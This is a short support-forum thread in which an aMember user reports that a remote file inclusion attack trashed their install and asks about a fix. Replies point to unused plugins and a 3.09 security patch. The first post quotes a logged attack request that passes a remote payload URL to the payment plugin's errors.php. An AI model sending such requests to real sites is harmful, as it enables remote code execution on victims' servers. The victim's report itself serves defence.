Vunerability - RFI attack

Discussion in 'Troubleshooting' started by buffpam, Nov 19, 2008.

  1. buffpam

    buffpam New Member

    Joined:
    Jan 17, 2007
    Messages:
    11
    My aMember install was recently trashed by a RFI attack.

    amember/signup.php///amember/plugins/payment//errors.php?error=http://www.csj-ath.be/medias/media.prt??? 200

    This trashed the amember install and required a restore from our host.

    Our version is around a year old (perhaps more?)

    Has this vunerability been fixed?
  2. davidm1

    davidm1 aMember User & Partner

    Joined:
    May 16, 2006
    Messages:
    4,437
  3. skippybosco

    skippybosco CGI-Central Partner Staff Member

    Joined:
    Aug 22, 2006
    Messages:
    2,526
    Another suggestion is to ensure you have deleted all plugins from your server that you are not using.
  4. buffpam

    buffpam New Member

    Joined:
    Jan 17, 2007
    Messages:
    11
    3.08

    And the suggested .htaccess file is already there, but it is not working correctly. We were never informed of the 3.09 security fix.

Share This Page